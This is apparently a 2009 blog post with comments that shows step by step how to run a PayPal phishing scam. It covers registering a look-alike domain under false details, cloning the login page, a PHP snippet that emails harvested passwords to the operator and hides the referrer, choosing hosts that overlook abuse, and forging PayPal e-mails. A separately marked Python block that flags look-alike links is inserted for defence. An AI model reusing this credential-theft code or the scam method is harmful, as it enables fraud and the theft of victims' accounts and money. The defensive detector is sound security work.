How to Run a Phishing Scam

Many people have the idea that phishing scams are complex, and are operated by organised criminals. In fact, they are not that hard to create at all. I could create one, and I could scam people for money. So that’s what I am going to do.* In this article, I will show you how easy it is to create your very own phishing scam set-up. I will deal with the ‘technical side’ — the website and the e-mail — but not with harvesting addresses, sending the e-mails, avoiding getting caught, and so on.

* I’ll stop at the making money part.


Abstract

The idea is to send an e-mail to people, claiming to be from PayPal, with information they need to act on. We will provide a link which the reader will be tricked into visiting, and then steal their details from our website. From there, it is simply a case of logging into their account, stealing more details, and their money.

(I am not discriminating against PayPal here — most other services on the Internet are susceptible as well).

The Domain

Our first goal is to get people onto our website. To do this, we need a genuine-looking domain. A few minutes at instantdomainsearch.com will find us one. I registered paypal-query.com. As a criminal would, I used false details. (As a criminal wouldn’t, I used my residential Internet connection).

False details

You could also use a free domain, reducing the risk of everything being traced back to you.

The Website

Now we have a domain, we just need a website which looks like PayPal. Its intention is to trick people into thinking it is an official PayPal website, so that they unwittingly provide their details to us.

Making this site turns out to be pretty easy. You just copy the HTML from the page, and change all references to images and pages to images and pages on your own site.

Copying PayPal images

Changing PayPal links

Once that is done, we can insert a little bit of PHP code to capture users’ details and e-mail them to us:

if ($_POST) {
	mail("[my email]", "PAYPAL PASS", $_POST["login_email"] . "\n\n" . $_POST["login_password"]);
	header("Location: https://referer.us/www.paypal.com/uk/cgi-bin/webscr?cmd=_security-center");
	exit;
}

And that is pretty much it. I also created a .htaccess file to redirect all page requests to the login page. Here is what it looks like — just like PayPal.com:

The phished PayPal site

The Web Host

We need to host our website with somebody who either:

  1. does not expect their service to be used with phishing attacks; or
  2. does not care whether their service is used for phishing attacks.

Many choose the first option, targeting small, free web-hosts. Reliability is not a concern, and it can be expected that a phishing site will be taken down soon after it is hosted. It is therefore a good idea for the captured information to be sent somewhere else. Better still is to retrieve this information passively, by querying a page on the server periodically, rather than having it actively sent to an address.

The E-mail

The third and most important part of this scam is the e-mail. This is what will prompt the user that they need to take action. One common e-mail is the ‘Your account needs to be verified’ one. We can take a real PayPal e-mail, like this one (or one which is more generic):

An e-mail from PayPal (real)

…and copy the source:

E-mail source

We then simply change all references of www.paypal.com to our site, www.paypal-query.com. The e-mail will appear exactly the same as the valid one, but will fool people into clicking through to our site, where we will attempt to capture their login details. This is what our phished e-mail looks like, much like the authentic one:

Phished PayPal e-mail
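The two tell-tale changes described above (every www.paypal.com link rewritten to the look-alike domain, and the referer.us redirector used in the capture script) are exactly what a mail filter can look for. The following added example, which is not code from the original post, scans a constructed copy of such an e-mail and flags links whose registered domain embeds the brand name without being the brand, links whose visible URL text disagrees with the real target, and links through a known referrer-hiding host; the allow-list and redirector list are assumptions for the example.

```python
import re
from urllib.parse import urlparse

# Constructed sample: a cloned notification e-mail in which the login link
# has been rewritten to the look-alike domain used in the post.
SAMPLE_EMAIL_HTML = """
<p>Your account needs to be verified.</p>
<a href="http://www.paypal-query.com/cgi-bin/webscr?cmd=_login-run">https://www.paypal.com/uk/</a>
<a href="https://www.paypal.com/uk/cgi-bin/webscr?cmd=_security-center">Security Centre</a>
<a href="https://referer.us/www.paypal.com/uk/">Help</a>
"""

BRAND = "paypal"
LEGIT_DOMAINS = {"paypal.com"}   # assumption: allow-list a mail filter would hold
REDIRECTORS = {"referer.us"}     # hosts that hide the real referring page

HREF_RE = re.compile(r'<a\s[^>]*href="([^"]+)"[^>]*>(.*?)</a>', re.I | re.S)

def registered_domain(host):
    """Last two labels of a hostname (good enough for .com-style names)."""
    parts = host.lower().split(".")
    return ".".join(parts[-2:])

def classify_link(href, text):
    """Return the reasons a link looks like a brand-impersonation lure."""
    reasons = []
    host = urlparse(href).hostname or ""
    dom = registered_domain(host)
    if dom in REDIRECTORS:
        reasons.append("known referrer-hiding redirector")
    elif dom not in LEGIT_DOMAINS:
        if BRAND in dom:
            reasons.append("brand name inside unrelated domain")
        # visible text shows a legitimate URL while the target points elsewhere
        shown = re.search(r"https?://([\w.-]+)", text)
        if shown and registered_domain(shown.group(1)) in LEGIT_DOMAINS:
            reasons.append("displayed URL does not match href")
    return reasons

def suspicious_links(html):
    """Map each flagged href to its reasons; clean links are omitted."""
    findings = {}
    for href, text in HREF_RE.findall(html):
        reasons = classify_link(href, text)
        if reasons:
            findings[href] = reasons
    return findings

if __name__ == "__main__":
    for href, why in suspicious_links(SAMPLE_EMAIL_HTML).items():
        print(href, "->", "; ".join(why))
```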

Attack Demo

Everything we need is now in place. After just ~650 words, you know how to create a phishing site. It may be shocking to find that all you need to create a phishing site is some common sense and the ability to copy and paste some code. In reality, it took me just 3-4 hours to create this. Here is a video demonstration from a victim’s perspective:


Comments

  1. On November 30, 2009 Very cool says:

    What’s that http://referer.us/ for?

  2. On December 21, 2009 Brendon says:

    @Very cool,

    It’s pretty useless, really. I thought I should do that in case PayPal have some mechanism to detect fraudulent referring sites.

  3. On January 14, 2010 Nick_Ninja says:

    Browsers have something called Referring URL. The problem with going directly to paypal is that paypal sees a bunch of requests coming from your phishing site and it gets taken down faster.
